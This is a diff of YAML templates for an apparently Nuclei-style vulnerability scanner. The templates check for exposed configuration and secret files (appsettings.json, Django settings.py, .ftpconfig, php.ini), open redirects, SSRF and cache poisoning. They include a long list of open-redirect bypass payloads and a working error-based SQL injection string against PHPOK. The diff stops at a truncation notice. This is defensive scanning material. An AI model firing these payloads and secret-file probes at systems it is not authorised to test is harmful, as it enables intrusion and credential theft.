- '<form name="fLogin" id="fLogin" method="post" onsubmit="return false;" action="">' - '<form name="fLogin" id="fLogin" method="post" onsubmit="return false;" action="">'
part: body
condition: and condition: and
- type: word - type: word
part: header
words: words:
- "Mini web server 1.0 ZTE corp 2005." - "Mini web server 1.0 ZTE corp 2005."
part: header
extractors:
- type: regex
part: body
group: 1
regex:
- '<div class="type"><font id="">(.+)<\/font><\/div>'

View File

@ -0,0 +1,33 @@
id: appsettings-file-disclosure
info:
name: Application Setting file disclosure
author: DhiyaneshDK,tess
severity: high
description: |
appsetting.json file discloses the DB connection strings containing sensitive information.
reference:
- https://twitter.com/hacker_/status/1518003548855930882?s=20&t=BVauK0yUjVl5yL7rwy0Eag
metadata:
verified: true
tags: exposure
requests:
- method: GET
path:
- "{{BaseURL}}/appsettings.json"
matchers-condition: and
matchers:
- type: word
words:
- "ConnectionStrings"
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200

View File

@ -0,0 +1,46 @@
id: django-secret-key
info:
name: Django Secret Key Exposure
author: geeknik,DhiyaneshDk
severity: high
reference: https://docs.gitguardian.com/secrets-detection/detectors/specifics/django_secret_key
metadata:
verified: true
shodan-query: html:settings.py
tags: django,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/settings.py"
- "{{BaseURL}}/app/settings.py"
- "{{BaseURL}}/django/settings.py"
- "{{BaseURL}}/settings/settings.py"
- "{{BaseURL}}/web/settings/settings.py"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "SECRET_KEY ="
- type: word
part: header
words:
- "text/html"
negative: true
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '"DJANGO_SECRET_KEY", "(.*)"'

View File

@ -0,0 +1,29 @@
id: ftpconfig
info:
name: Atom remote-ssh ftpconfig Exposure
author: geeknik,DhiyaneshDK
description: Created by remote-ssh for Atom, contains SFTP/SSH server details and credentials
severity: high
metadata:
verified: true
shodan-query: html:ftpconfig
tags: atom,ftp,config,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/.ftpconfig"
matchers-condition: and
matchers:
- type: word
words:
- '"protocol":'
- '"host":'
- '"user":'
condition: and
- type: status
status:
- 200

View File

@ -0,0 +1,33 @@
id: git-mailmap
info:
name: Git Mailmap File Disclosure
author: geeknik,DhiyaneshDK
severity: low
reference: https://man7.org/linux/man-pages/man5/gitmailmap.5.html
metadata:
verified: true
shodan-query: html:mailmap
tags: config,exposure,git,mailmap
requests:
- method: GET
path:
- "{{BaseURL}}/.mailmap"
matchers-condition: and
matchers:
- type: regex
regex:
- "(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|\"(?:[\\x01-\\x08\\x0b\\x0c\\x0e-\\x1f\\x21\\x23-\\x5b\\x5d-\\x7f]|\\\\[\\x01-\\x09\\x0b\\x0c\\x0e-\\x7f])*\")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\\[(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?|[a-z0-9-]*[a-z0-9]:(?:[\\x01-\\x08\\x0b\\x0c\\x0e-\\x1f\\x21-\\x5a\\x53-\\x7f]|\\\\[\\x01-\\x09\\x0b\\x0c\\x0e-\\x7f])+)\\])"
- type: word
part: body
words:
- "# Theresa O'Connor:"
negative: true
- type: status
status:
- 200

View File

@ -0,0 +1,32 @@
id: php-ini
info:
name: Php.ini File Disclosure
author: geeknik,DhiyaneshDK
severity: low
reference: https://www.php.net/manual/en/configuration.file.php
metadata:
verified: true
shodan-query: php.ini
tags: config,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/php.ini"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "[PHP]"
- "short_open_tag"
- "safe_mode"
- "expose_php"
condition: and
- type: status
status:
- 200

View File

@ -11,10 +11,10 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}//example.com/%2F..' - '{{BaseURL}}//interact.sh/%2F..'
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

View File

@ -13,7 +13,7 @@ self-contained: true
requests: requests:
- method: GET - method: GET
path: path:
- "https://api.debounce.io/v1/?api={{token}}&email=test@example.com" - "https://api.debounce.io/v1/?api={{token}}&email=test@interact.sh"
matchers: matchers:
- type: word - type: word

View File

@ -15,7 +15,7 @@ self-contained: true
requests: requests:
- method: GET - method: GET
path: path:
- https://fullhunt.io/api/v1/domain/example.com/details - https://fullhunt.io/api/v1/domain/interact.sh/details
headers: headers:
X-API-Key: "{{token}}" X-API-Key: "{{token}}"

View File

@ -14,7 +14,7 @@ self-contained: true
requests: requests:
- method: GET - method: GET
path: path:
- https://sslmate.com/api/v2/certs/example.com?expand=current.crt - https://sslmate.com/api/v2/certs/interact.sh?expand=current.crt
headers: headers:
Authorization: Bearer {{token}} Authorization: Bearer {{token}}

View File

@ -13,9 +13,9 @@ requests:
- raw: - raw:
- | - |
GET /?{{randstr}}=9 HTTP/1.1 GET /?{{randstr}}=9 HTTP/1.1
X-Forwarded-Prefix: prefix.cache.example.com X-Forwarded-Prefix: prefix.cache.interact.sh
X-Forwarded-Host: host.cache.example.com X-Forwarded-Host: host.cache.interact.sh
X-Forwarded-For: for.cache.example.com X-Forwarded-For: for.cache.interact.sh
- | - |
GET /?{{randstr}}=9 HTTP/1.1 GET /?{{randstr}}=9 HTTP/1.1
@ -24,10 +24,10 @@ requests:
matchers: matchers:
- type: dsl - type: dsl
dsl: dsl:
- 'contains(body_2, "cache.example.com")' - 'contains(body_2, "cache.interact.sh")'
extractors: extractors:
- type: regex - type: regex
part: response part: response
regex: regex:
- "(prefix|host|for).cache.example.com" - "(prefix|host|for).cache.interact.sh"

View File

@ -15,94 +15,94 @@ requests:
payloads: payloads:
redirect: redirect:
- '%0a/example.com/' - '%0a/interact.sh/'
- '%0d/example.com/' - '%0d/interact.sh/'
- '%00/example.com/' - '%00/interact.sh/'
- '%09/example.com/' - '%09/interact.sh/'
- '%5C%5Cexample.com/%252e%252e%252f' - '%5C%5Cinteract.sh/%252e%252e%252f'
- '%5Cexample.com' - '%5Cinteract.sh'
- '%5cexample.com/%2f%2e%2e' - '%5cinteract.sh/%2f%2e%2e'
- '%5c{{RootURL}}example.com/%2f%2e%2e' - '%5c{{RootURL}}interact.sh/%2f%2e%2e'
- '../example.com' - '../interact.sh'
- '.example.com' - '.interact.sh'
- '/%5cexample.com' - '/%5cinteract.sh'
- '////\;@example.com' - '////\;@interact.sh'
- '////example.com' - '////interact.sh'
- '///example.com' - '///interact.sh'
- '///example.com/%2f%2e%2e' - '///interact.sh/%2f%2e%2e'
- '///example.com@//' - '///interact.sh@//'
- '///{{RootURL}}example.com/%2f%2e%2e' - '///{{RootURL}}interact.sh/%2f%2e%2e'
- '//;@example.com' - '//;@interact.sh'
- '//\/example.com/' - '//\/interact.sh/'
- '//\@example.com' - '//\@interact.sh'
- '//\example.com' - '//\interact.sh'
- '//\texample.com/' - '//\tinteract.sh/'
- '//example.com/%2F..' - '//interact.sh/%2F..'
- '//example.com//' - '//interact.sh//'
- '//example.com@//' - '//interact.sh@//'
- '//example.com\texample.com/' - '//interact.sh\tinteract.sh/'
- '//https://example.com@//' - '//https://interact.sh@//'
- '/<>//example.com' - '/<>//interact.sh'
- '/\/\/example.com/' - '/\/\/interact.sh/'
- '/\/example.com' - '/\/interact.sh'
- '/\example.com' - '/\interact.sh'
- '/example.com' - '/interact.sh'
- '/example.com/%2F..' - '/interact.sh/%2F..'
- '/example.com/' - '/interact.sh/'
- '/example.com/..;/css' - '/interact.sh/..;/css'
- '/https:example.com' - '/https:interact.sh'
- '/{{RootURL}}example.com/' - '/{{RootURL}}interact.sh/'
- '/〱example.com' - '/〱interact.sh'
- '/〵example.com' - '/〵interact.sh'
- '/ゝexample.com' - '/ゝinteract.sh'
- '/ーexample.com' - '/ーinteract.sh'
- '/ーexample.com' - '/ーinteract.sh'
- '<>//example.com' - '<>//interact.sh'
- '@example.com' - '@interact.sh'
- '@https://example.com' - '@https://interact.sh'
- '\/\/example.com/' - '\/\/interact.sh/'
- 'example%E3%80%82com' - 'interact%E3%80%82sh'
- 'example.com' - 'interact.sh'
- 'example.com/' - 'interact.sh/'
- 'example.com//' - 'interact.sh//'
- 'example.com;@' - 'interact.sh;@'
- 'https%3a%2f%2fexample.com%2f' - 'https%3a%2f%2finteract.sh%2f'
- 'https:%0a%0dexample.com' - 'https:%0a%0dinteract.sh'
- 'https://%0a%0dexample.com' - 'https://%0a%0dinteract.sh'
- 'https://%09/example.com' - 'https://%09/interact.sh'
- 'https://%2f%2f.example.com/' - 'https://%2f%2f.interact.sh/'
- 'https://%3F.example.com/' - 'https://%3F.interact.sh/'
- 'https://%5c%5c.example.com/' - 'https://%5c%5c.interact.sh/'
- 'https://%5cexample.com@' - 'https://%5cinteract.sh@'
- 'https://%23.example.com/' - 'https://%23.interact.sh/'
- 'https://.example.com' - 'https://.interact.sh'
- 'https://////example.com' - 'https://////interact.sh'
- 'https:///example.com' - 'https:///interact.sh'
- 'https:///example.com/%2e%2e' - 'https:///interact.sh/%2e%2e'
- 'https:///example.com/%2f%2e%2e' - 'https:///interact.sh/%2f%2e%2e'
- 'https:///example.com@example.com/%2e%2e' - 'https:///interact.sh@interact.sh/%2e%2e'
- 'https:///example.com@example.com/%2f%2e%2e' - 'https:///interact.sh@interact.sh/%2f%2e%2e'
- 'https://:80#@example.com/' - 'https://:80#@interact.sh/'
- 'https://:80?@example.com/' - 'https://:80?@interact.sh/'
- 'https://:@\@example.com' - 'https://:@\@interact.sh'
- 'https://:@example.com\@example.com' - 'https://:@interact.sh\@interact.sh'
- 'https://:@example.com\@WillBeReplaced.com' - 'https://:@interact.sh\@WillBeReplaced.com'
- 'https://;@example.com' - 'https://;@interact.sh'
- 'https://\texample.com/' - 'https://\tinteract.sh/'
- 'https://example.com/example.com' - 'https://interact.sh/interact.sh'
- 'https://example.com/https://example.com/' - 'https://interact.sh/https://interact.sh/'
- 'https://www.\.example.com' - 'https://www.\.interact.sh'
- 'https:/\/\example.com' - 'https:/\/\interact.sh'
- 'https:/\example.com' - 'https:/\interact.sh'
- 'https:/example.com' - 'https:/interact.sh'
- 'https:example.com' - 'https:interact.sh'
- '{{RootURL}}example.com' - '{{RootURL}}interact.sh'
- '〱example.com' - '〱interact.sh'
- '〵example.com' - '〵interact.sh'
- 'ゝexample.com' - 'ゝinteract.sh'
- 'ーexample.com' - 'ーinteract.sh'
- 'ーexample.com' - 'ーinteract.sh'
- '?page=example.com&_url=example.com&callback=example.com&checkout_url=example.com&content=example.com&continue=example.com&continueTo=example.com&counturl=example.com&data=example.com&dest=example.com&dest_url=example.com&dir=example.com&document=example.com&domain=example.com&done=example.com&download=example.com&feed=example.com&file=example.com&host=example.com&html=example.com&http=example.com&https=example.com&image=example.com&image_src=example.com&image_url=example.com&imageurl=example.com&include=example.com&langTo=example.com&media=example.com&navigation=example.com&next=example.com&open=example.com&out=example.com&page=example.com&page_url=example.com&pageurl=example.com&path=example.com&picture=example.com&port=example.com&proxy=example.com&redir=example.com&redirect=example.com&redirectUri=example.com&redirectUrl=example.com&reference=example.com&referrer=example.com&req=example.com&request=example.com&retUrl=example.com&return=example.com&returnTo=example.com&return_path=example.com&return_to=example.com&rurl=example.com&show=example.com&site=example.com&source=example.com&src=example.com&target=example.com&to=example.com&uri=example.com&url=example.com&val=example.com&validate=example.com&view=example.com&window=example.com&redirect_to=example.com&ret=example.com&r2=example.com&img=example.com&u=example.com&r=example.com&URL=example.com&AuthState=example.com' - '?page=interact.sh&_url=interact.sh&callback=interact.sh&checkout_url=interact.sh&content=interact.sh&continue=interact.sh&continueTo=interact.sh&counturl=interact.sh&data=interact.sh&dest=interact.sh&dest_url=interact.sh&dir=interact.sh&document=interact.sh&domain=interact.sh&done=interact.sh&download=interact.sh&feed=interact.sh&file=interact.sh&host=interact.sh&html=interact.sh&http=interact.sh&https=interact.sh&image=interact.sh&image_src=interact.sh&image_url=interact.sh&imageurl=interact.sh&include=interact.sh&langTo=interact.sh&media=interact.sh&navigation=interact.sh&next=interact.sh&open=interact.sh&out=interact.sh&page=interact.sh&page_url=interact.sh&pageurl=interact.sh&path=interact.sh&picture=interact.sh&port=interact.sh&proxy=interact.sh&redir=interact.sh&redirect=interact.sh&redirectUri=interact.sh&redirectUrl=interact.sh&reference=interact.sh&referrer=interact.sh&req=interact.sh&request=interact.sh&retUrl=interact.sh&return=interact.sh&returnTo=interact.sh&return_path=interact.sh&return_to=interact.sh&rurl=interact.sh&show=interact.sh&site=interact.sh&source=interact.sh&src=interact.sh&target=interact.sh&to=interact.sh&uri=interact.sh&url=interact.sh&val=interact.sh&validate=interact.sh&view=interact.sh&window=interact.sh&redirect_to=interact.sh&ret=interact.sh&r2=interact.sh&img=interact.sh&u=interact.sh&r=interact.sh&URL=interact.sh&AuthState=interact.sh'
stop-at-first-match: true stop-at-first-match: true
matchers-condition: and matchers-condition: and
@ -111,7 +111,7 @@ requests:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- type: status - type: status
status: status:

View File

@ -15,13 +15,13 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/redirect-to?url=https%3A%2F%2Fexample.com" - "{{BaseURL}}/redirect-to?url=https%3A%2F%2Finteract.sh"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: dsl - type: dsl
dsl: dsl:
- 'location == "https://example.com"' - 'location == "https://interact.sh"'
- type: status - type: status
status: status:

View File

@ -1,29 +0,0 @@
id: ibm-websphere-ssrf
info:
name: IBM WebSphere Portal SSRF
author: pdteam
severity: high
reference:
- https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/
tags: ibm,ssrf,websphere
requests:
- method: GET
path:
- '{{BaseURL}}/docpicker/internal_proxy/http/example.com'
- '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/example.com'
redirects: true
max-redirects: 2
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<title>Example Domain</title>"

View File

@ -13,7 +13,7 @@ requests:
path: path:
- "{{BaseURL}}" - "{{BaseURL}}"
headers: headers:
l5d-dtab: /svc/* => /$/inet/example.com/443 l5d-dtab: /svc/* => /$/inet/interact.sh/443
matchers-condition: or matchers-condition: or
matchers: matchers:

View File

@ -12,10 +12,10 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/webadmin/authportal/bounce.php?url=https://example.com/" - "{{BaseURL}}/webadmin/authportal/bounce.php?url=https://interact.sh/"
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'

View File

@ -1,19 +1,18 @@
id: CVE-2020-22210 id: 74cms-sqli
info: info:
name: 74cms Sql Injection name: 74cms Sql Injection
author: princechaddha author: princechaddha
severity: critical severity: critical
description: A SQL injection vulnerability exists in 74cms 3.2.0 via the x parameter to ajax_officebuilding.php. description: A SQL injection vulnerability exists in 74cms 5.0.1 AjaxPersonalController.class.php.
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2020-22210 - https://github.com/possib1e/vuln/issues/3
- https://github.com/blindkey/cve_like/issues/11
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8 cvss-score: 9.8
cve-id: CVE-2020-22210 cve-id: CVE-2020-22210
cwe-id: CWE-89 cwe-id: CWE-89
tags: cve,cve2020,74cms,sqli tags: 74cms,sqli
requests: requests:
- method: GET - method: GET
@ -27,3 +26,4 @@ requests:
part: body part: body
# Enhanced by mp on 2022/03/02 # Enhanced by mp on 2022/03/02
# Enhanced by ritikchaddha on 2022/05/05

View File

@ -9,10 +9,10 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/gotoURL.asp?url=example.com&id=43569" - "{{BaseURL}}/gotoURL.asp?url=interact.sh&id=43569"
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*:\s*)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*)$' - '(?m)^(?:Location\s*:\s*)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*)$'

View File

@ -12,25 +12,25 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/bitrix/rk.php?goto=https://example.com' - '{{BaseURL}}/bitrix/rk.php?goto=https://interact.sh'
- '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=&goto=https://example.com' - '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/redirect.php?event3=352513&goto=https://example.com' - '{{BaseURL}}/bitrix/redirect.php?event3=352513&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://example.com' - '{{BaseURL}}/bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=https://example.com' - '{{BaseURL}}/bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=download&goto=https://example.com' - '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=download&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://example.com' - '{{BaseURL}}/bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://example.com' - '{{BaseURL}}/bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://example.com' - '{{BaseURL}}/bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://example.com' - '{{BaseURL}}/bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com' - '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com' - '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://interact.sh'
stop-at-first-match: true stop-at-first-match: true
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header part: header
- type: status - type: status

View File

@ -14,13 +14,13 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/plus/download.php?open=1&link=aHR0cHM6Ly9ldmlsLmNvbQo=" - "{{BaseURL}}/plus/download.php?open=1&link=aHR0cHM6Ly9pbnRlcmFjdC5zaA=="
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
words: words:
- "Location: https://evil.com" - "Location: https://interact.sh"
part: header part: header
- type: status - type: status

View File

@ -12,10 +12,10 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/homeautomation_v3_3_2/api.php?do=groups/toggle&groupid=1&status=1&redirect=https://example.com/" - "{{BaseURL}}/homeautomation_v3_3_2/api.php?do=groups/toggle&groupid=1&status=1&redirect=https://interact.sh/"
matchers: matchers:
- type: regex - type: regex
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header part: header

View File

@ -13,10 +13,10 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/website/lang/en_US?r=https://example.com/" - "{{BaseURL}}/website/lang/en_US?r=https://interact.sh/"
matchers: matchers:
- type: regex - type: regex
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header part: header

View File

@ -13,10 +13,10 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/otobo/index.pl?Action=ExternalURLJump;URL=http://www.example.com' - '{{BaseURL}}/otobo/index.pl?Action=ExternalURLJump;URL=http://www.interact.sh'
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

View File

@ -0,0 +1,21 @@
id: phpok-sqli
info:
name: PHPOK - Sql Injection
author: ritikchaddha
severity: high
metadata:
fofa-query: app="phpok"
tags: phpok,sqli
requests:
- method: GET
path:
- "{{BaseURL}}/api.php?c=project&f=index&token=1234&id=news&sort=1 and extractvalue(1,concat(0x7e,md5({{randstr}}))) --+"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{{md5("{{randstr}}")}}'

Some files were not shown because too many files have changed in this diff Show More